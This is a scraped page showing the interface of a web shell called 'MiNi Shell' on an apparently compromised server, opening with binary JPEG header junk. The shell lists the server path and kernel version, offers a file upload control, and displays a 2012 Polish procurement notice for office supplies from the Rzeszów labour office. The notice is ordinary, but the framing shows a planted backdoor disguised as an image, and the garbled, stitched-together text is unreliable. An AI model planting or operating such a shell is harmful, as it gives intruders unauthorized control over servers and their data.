JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120509/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120509/146668-N-2012.html

<p class="kh_header"><b>Rzeszów: dostawa artykułów i urządzeń biurowych, papieru biurowego oraz tonerów do kserokopiarek</b><br>
<b>Numer ogłoszenia: 146668 - 2012; data zamieszczenia: 09.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy w Rzeszowie , ul. Lisa Kuli 20, 35-025 Rzeszów, woj. podkarpackie, tel. 17 850 92 00, faks 17 850 92 42, 17 852 44 57.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wup-rzeszow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa artykułów i urządzeń biurowych, papieru biurowego oraz tonerów do kserokopiarek.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów i urządzeń biurowych, papieru biurowego oraz tonerów do kserokopiarek:

1.		Bloczki samoprzylepne 75x75 op.100 kartek	op.	486;
2.		Cienkopis niebieski,  końcówka oprawiana w metal, gr. linii pisania 0,4 mm, zatyczka w kolorze tuszu	szt.	143;
3.		Datownik samotuszujący w obudowie z tworzywa ABS, z datą  w układzie DD.MM.RRRR, wys. cyfr 3,8-4,5 mm	szt.	1;
4.		Długopis czarny z gumowym uchwytem i automatycznie chowanym wkładem, przeźroczysta oprawa, na wymienne wkłady  klip na skuwce w kolorze tuszu	szt.	189;
5.		Długopis niebieski z gumowym uchwytem i automatycznie chowanym wkładem, przeźroczysta oprawa, na wymienne wkłady  klip na skuwce w kolorze tuszu	szt.	306;
6.		Długopis zielony z gumowym uchwytem i automatycznie chowanym wkładem, przeźroczysta oprawa, na wymienne wkłady  klip na skuwce w kolorze tuszu	szt.	43;
7.		Długopis czerwony z gumowym uchwytem  i automatycznie chowanym wkładem, przeźroczysta oprawa, na wymienne wkłady  klip na skuwce w kolorze tuszu	szt.	66;
8.		Dziurkacz biurowy wykonany z metalu, z prostym w obsłudze ogranicznikiem formatu, plastikowa nakładka nie rysuje mebli, łatwy do opróżnienia pojemnik na odpadki, dziurkuje do 25 kartek, odległość między dziurkami 80 mm, 	szt.	30;
9.		Folia przeźroczysta do bindowania, op. 100 szt.	op.	12;
10.		Gumka polymerowa o wym. min. 3,5x1,6x1,2 cm, wycierająca ołówek nie naruszając struktury papieru 	szt.	137;
11.		Kalkulator biurowy z 12 pozycyjnym wyświetlaczem, podwójne zasilanie, posiada funkcje: zaokrąglanie wyników, obliczanie marży, klawisz cofania, klawisz zmiany znaku +/-, klawisz podwójnego zera 	szt.	20;
12.		Klej biurowy  z aplikatorem, min. poj. 40 ml	szt.	87;
13.		Koszulka groszkowa  na dokumenty A4 op. 100 szt. o grub. min.48mic.	op.	150;
14.		Koszulka groszkowa maxi na dokumenty A4 op. 25 szt., mieszczą 60 kartek o gramaturze 90g/m2	op.	123;
15.		Korektor w piórze, szybkoschnący precyzyjny z metalową końcówką pojemność min. 12 ml 	szt.	87;
16.		Koperty C6 białe samoprzylepne op. 1000 szt.	op.	26;
17.		Koperty C5 brązowe z paskiem samoprzylepnym op. 500 szt.	op.	28;
18.		Koperty C4 brązowe z paskiem samoprzylepnym  op. 250 szt. 	op.	23;
19.		Koperty brązowe z rozszerzanymi bokami  i spodem A4, samoklejące	szt.	1840;
20.		Kostka biała nieklejona 85x85x40mm	op.	128;
21.		Linijka 30cm - przeźroczysta	szt.	19;
22.		Markery do tablic z okrągłą końcówką, suchościeralne, op. 4 kolory + gąbka	op.	16;
23.		Markery olejowe szybkoschnące, nieścieralne i wodoodporne, czarne, grubość linii pisania 1-2 mm	szt.	61;
24.		Nożyczki metalowe, wykonane z nierdzewnej stali, wygodne ergonomiczne uchwyty 16 cm ( +/- 2cm)	szt.	43;
25.		Okładki do bindowania zielone, białe, czerwone, op. 100 szt.	op.	10;
26.		Ołówek lakierowany HB z gumką, trwały niełamliwy grafit	szt.	240;
27.		Długopis żelowy automatyczny, zielony z przeźroczystym korpusem barwionym zgodnie z kolorem tuszu i gumowym uchwytem, grubość linii pisania 0,3 mm Możliwość zastosowania wkładów wymiennych 	szt.	68;
28.		Długopis żelowy automatyczny, czerwony z przeźroczystym korpusem barwionym zgodnie z kolorem tuszu i gumowym uchwytem, grubość linii pisania 0,3 mm Możliwość zastosowania wkładów wymiennych 	szt.	60;
29.		Długopis żelowy automatyczny, czarny z przeźroczystym korpusem barwionym zgodnie z kolorem tuszu i gumowym uchwytem, grubość linii pisania 0,3 mm Możliwość zastosowania wkładów wymiennych 	szt.	123;
30.		Długopis żelowy automatyczny, niebieski z przeźroczystym korpusem barwionym zgodnie z kolorem tuszu i gumowym uchwytem, grubość linii pisania 0,3 mm Możliwość zastosowania wkładów wymiennych 	szt.	284;
31.		Papier biurowy o parametrach nie gorszych niż: format A4 / gramatura 80 g/m2 / białość CIE161 / wilgotność % 3,8-5,0 / nieprzeźroczystość % >90 	ryz	1420;
32.		Pinezki do tablicy korkowej, op. 50 szt.	op.	25;
33.		Przekładki segregatorowe A 4 kolorowe z polipropylenu, op. 10 szt.	op.	47;
34.		Rozszywacz	szt.	32;
35.		Skoroszyt sztywny zawieszany do segregatora A4, op. 10 szt., wykonany z PCV z przeźroczystą przednią okładką w kolorach zielony, żółty, niebieski	op.	80;
36.		Spinacze biurowe okrągłe 25 mm op. 100 szt.	op.	126;
37.		Spinacze biurowe okrągłe 50 mm,  op. 100 szt.	op.	57;
38.		Teczka A 4 na gumkę biała z kartonu 350 g/m2	szt.	1675;
39.		Teczka A 4 wiązana biała z kartonu 350 g/m2	szt.	875;
40.		Teczka A 4 wiązana  biała szeroka wykonana z papieru o gramaturze 400g/m2 mogąca pomieścić w zagięciach min. ryzę papieru A4 	szt.	2136;
41.		Teczka lakierowana A 4 z gumka kolorowa z kartonu 400g/m2, czarna, czerwona, zielona, niebieska	szt.	405;
42.		Temperówka metalowa kostka, dwuotworowa, stalowe ostrze mocowane wkrętem,	szt.	54;
43.		Taśma klejąca przeźroczysta szer. 18mm, długość 20m	szt.	139;
44.		Taśma pakowa, szeroka, przeźroczysta	szt.	45;
45.		Tusz do pieczątek czerwony	op.	15;
46.		Zakreślacze, op. 4 szt. 	op.	134;
47.		Zeszyt A4 w twardej oprawie 96 k. w kratkę	szt.	43;
48.		Zeszyt A5 w twardej oprawie 96 k. w kratkę	szt.	57;
49.		Zszywacz biurowy, górna część wykonana z tworzywa sztucznego, dolna część metalowa z plastikową, antypoślizgową nakładką, części mechaniczne z metalu, na zszywki 24/6 i 26/6, zszywanie zamknięte i otwarte, zszywa do 25 kartek, 	szt.	26;
50.		Zszywki do zszywacza kasetowego  Leitz 5550, 5551- K-6 op. 1 kasetka po 210 zszywek 	op.	50;
51.		Zszywki do zszywacza kasetowego  Leitz 5550, 5551- K-8 op. 1 kasetka po 210 zszywek 	op.	49;
52.		Zszywki do zszywacza kasetowego  Leitz 5550, 5551- K-10 op. 1 kasetka po 210 zszywek 	op.	46;
53.		Zszywki do zszywacza  kasetowego Leitz 5550, 5551- K-12 op. 1 kasetka po 210 zszywek 	op.	32;
54.		Zszywki 24/6, op. 1000 szt.	op.	188;
55.		Segregator oklejony zewnątrz i wewnątrz poliolefiną, na dolnych krawędziach metalowe okucia, format A4/75 mm zielony, czerwony, niebieski	szt.	504;
56.		Segregator oklejony zewnątrz i wewnątrz poliolefiną, na dolnych krawędziach metalowe okucia, format A4/50 mm zielony, czerwony, niebieski	szt.	95;
57.		Klip 19 mm,op.12 szt.	op.	25;
58.		Klip 32 mm, op.12 szt.	op.	11;
59.		Klip 51 mm, op.12 szt.	op.	11;
60.		Zakładki indeksujące wąskie, przeźroczyste,  w 4 kolorach, można po nich pisać, można je wielokrotnie przyklejac i odklejać 	op.	91;
61.		Korektor w taśmie o minimalnych wymiarach taśmy: szer. 5 mm, długość 8m,	szt.	30;
62.		Bloczki samoprzylepne 50x38 op.100 kartek	op.	107;
63.		Sznurek pakowy, polipropylenowy, biały, grubość 3-4mm, ok. 0,5 kg w op.	szt.	10;
64.		Klip dwuczęściowy, plastikowy, przeznaczony do archiwizacji dokumentów, op. 100 szt.	op.	10;
65.		Szuflada na dokumenty z plastiku A4 przeźroczysta dymna	szt.	55;
66.		Grzbiety wsuwane 6 mm, op. 50 szt.	op.	5;
67.		Grzbiety wsuwane 10mm, op. 50 szt.	op.	6;
68.		Gilotyna  z automatycznym systemem docisku papieru, z przezroczystą osłoną zapewniającą bezpieczeństwo pracy, ergonomiczny uchwyt przeciwpoślizgowy, na blacie roboczym standardowe szablony formatów (minimum A5, A4)	szt.	1;
69.		Płyta CD wysokiej jakości w plastikowym opakowaniu typu slim, umożliwiająca zapis danych o pojemności min. 700 MB	szt.	150;
70.		Płyta DVD wysokiej jakości w plastikowym opakowaniu typu slim, umożliwiająca zapis danych o pojemności min. 4,7 GB	szt.	70;
71.		Papier biurowy kolorowy wysokiej jakości (żółty-2, pomarańczowy-2, seledynowy-2, niebieski-2, różowy-2), format A4, 80g/m2	ryz	10;
72.		Telefon bezprzewodowy analogowy z menu w jęz. polskim, identyfikacją abonenta wywołującego, , podświetlaną klawiaturą i wyświetlaczem, słuchawką głośnomówiącą, regulacją głośności, książką telefoniczną na min. 50 numerów, pamięcią min. 10 ostatnio wybranych numerów,	szt.	7;
73.		Ofertówka sztywna przeźroczysta, op. 25 szt.	szt.	8;
74.		Niszczarka o parametrach nie gorszych niż: Automatyczny start/stop i funkcja cofania, blokada bezpieczeństwa, diody informujące o gotowości do działania, włączeniu zabezpieczenia termicznego, włączeniu blokady bezpieczeństwa, zakleszczeniu papieru, wyjęciu lub nieprawidłowo włożonym koszu, niszczy zszywki, małe spinacze, karty kredytowe, i płyty CD, szerokość wejścia min. 230 mm, wyjmowany kosz o pojemności min. 23 L, DIN2, gwarancja na całość urządzenia 2 lata, na noże tnące 5 lat	szt.	3;
75.		Tablica korkowa w ramie drewnianej, wym. 60x90cm	szt.	1;
76.		Kubek na długopisy	szt.	15;
77.		Rolka 57 mm do kalkulatora Citizen Cx-123 II	szt.	40;
78.		Teczka skrzydłowa A4 z gumką, grubość tektury min. 2  mm, oklejona folią polipropylenową	szt.	20;
79.		Koszulka na katalogi poszerzana A4, z harmonijkowym bokiem, z możliwością wpięcia do segregatora, op. 10 szt.	op.	11;
80.		Marker do płyt CD czarny, wodoodporny, nieścieralny, szybkoschnący, gr. linii pisania 0,5-1,0 mm 	op.	52;
81.		Pudełko do archiwizacji dokumentów A4 szer. grzbietu 100 mm, wys. max. 260 mm, głęb. max 320 mm	szt.	80;
82.		Tusz do pieczątek czarny	szt.	6;
83.		Pudło do przechowywania płyt CD,  wykonane z mocnego kartonu pokrytego okleiną; mieści do 165 CD w papierowych kieszeniach, pudła mozna ustawić jedno na drugim; łatwo się składa, mocowanie ścianek przy pomocy zatrzasków, na części frontowej ramka do opisu zawartości pudła; wymiary: szer. 125-135 mm, wys. 130-140 mm, gł. 350-360 mm 	szt.	61;
84.		Papier biurowy o parametrach nie gorszych niż: format A4 / gramatura 160 g/m2 / białość CIE161 	ryz	10;
85.		Papier ozdobny A4 groszkowany kremowy o gramaturze 200-250 g/m2, w op. 25 arkuszy	op.	2;
86.		Teczka kopertowa A4 przeźroczysta, w jednym kolorze, zapinana na nap lub zatrzask, wpinana do segregatora	szt.	200;
87.		Wąsy skoroszytowe polipropylenowe z metalową blaszką, 4 otwory umożliwiające wpięcie do segregatora, op. 25 szt.	op.	5;
88.		Sprężone powietrze, obj.  min. 300 ml	szt.	20;
89.		Zszywacz kasetowy, wyposażony w wymienne jednorazowe kasetki zszywek dostosowanych do różnych wielkości plików kartek, zszywanie zamknięte, w komplecie 4 kasety zszywek, zszywa  do 80 kartek o gr. 80 g/m2, min. 10 lat gwarancji	szt.	2;
90.		Pianka czyszcząca do monitorów LCD, poj. min. 100 ml	op.	10;
91.		Pianka antystatyczna do czyszczenia powierzchni  plastikowych i metalowych op. min. 400 ml	op.	6;
92.		Etykiety samoprzylepne o wym. 105x148 mm, op. 100 arkuszy	op.	3;
93.		Kołobrulion A5 w kratkę, min. 96 kartek	szt.	36;
94.		Teczka do podpisu A4 z twardego kartonu pokrytego folią PP, na przedniej okładce okienko do opisu zawartości, rozciągliwy grzbiet, min. 20 przegródek, czarna, czerwona	szt.	2;
95.		Skoroszyt oczkowy 1/1 z metalowymi wąsami, wykonany z twardej tektury o gramaturze min. 250 g/m2	szt.	600;
96.		Skoroszyt oczkowy 1/2 z metalowymi wąsami, wykonany z twardej tektury o gramaturze min. 250 g/m2	szt.	100;
97.		Folia do drukarki atramentowej, op. 50 szt.	op.	2;
98.		Toner do kserokopiarek Ricoh Aficio MP 3010, 3030, MP 3350B, Nashuatec MP 3350B*	szt.	8;
99.		Toner do kserokopiarek Ricoh Aficio1018D*	szt.	3. * Tonery stanowiące przedmiot zamówienia muszą być fabrycznie nowe: tzn. produkty wykonane z nowych elementów lub pełnowartościowych komponentów z odzysku, bez śladów uszkodzenia i użytkowania, w oryginalnych opakowaniach producenta z widocznym logo, symbolem produktu, terminem przydatności do użytku, posiadające wszelkie zabezpieczenia szczelności zbiorników z tonerem oraz wskazaniem typów urządzeń, z którymi są kompatybilne.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.00.00-7, 30.19.76.30-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania powyższego warunku udziału w postępowaniu na podstawie informacji zawartych w złożonym przez Wykonawcę w ofercie oświadczeniu o spełnieniu warunków udziału w postępowaniu, o którym mowa w punkcie 5.1 SIWZ, w oparciu o zasadę spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania powyższego warunku udziału w postępowaniu na podstawie informacji zawartych w złożonym przez Wykonawcę w ofercie oświadczeniu o spełnieniu warunków udziału w postępowaniu, o którym mowa w punkcie 5.1 SIWZ, w oparciu o zasadę spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania powyższego warunku udziału w postępowaniu na podstawie informacji zawartych w złożonym przez Wykonawcę w ofercie oświadczeniu o spełnieniu warunków udziału w postępowaniu, o którym mowa w punkcie 5.1 SIWZ, w oparciu o zasadę spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania powyższego warunku udziału w postępowaniu na podstawie informacji zawartych w złożonym przez Wykonawcę w ofercie oświadczeniu o spełnieniu warunków udziału w postępowaniu, o którym mowa w punkcie 5.1 SIWZ, w oparciu o zasadę spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania powyższego warunku udziału w postępowaniu na podstawie informacji zawartych w złożonym przez Wykonawcę w ofercie oświadczeniu o spełnieniu warunków udziału w postępowaniu, o którym mowa w punkcie 5.1 SIWZ, w oparciu o zasadę spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Pełnomocnictwo lub inny dokument potwierdzający uprawnienia do podpisywania oferty, jeżeli uprawnienia Osoby/Osób podpisujących ofertę nie wynikają z przepisów prawa lub złożonych w ofercie dokumentów rejestrowych. Treść pełnomocnictwa powinna jednoznacznie określać czynności do wykonania których pełnomocnik jest upoważniony. Pełnomocnictwo lub inny dokument potwierdzający uprawnienia do podpisywania oferty musi być złożone/y w oryginale lub kopii uwierzytelnionej przez notariusza.
2.	W celu potwierdzenia, że Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, Wykonawca złoży w ofercie w szczególności pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania 
z nich przy wykonaniu zamówienia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.wup-rzeszow.e-zet.pl/?c=mdTresc-cmPokaz-552<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. L. Lisa Kuli 20, 35-025 Rzeszów, pokój nr 102.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.05.2012 godzina 10:00, miejsce: ul. L. Lisa Kuli 20, 35-025 Rzeszów, kancelaria na parterze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Część zamówienia jest współfinansowana ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
2. Termin realizacji zamówienia do:
1)	7 dni od daty zawarcia umowy (dostawa papieru biurowego),
2)	14 dni od daty zawarcia umowy (dostawa artykułów i urządzeń biurowych oraz tonerów do kserokopiarek).</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com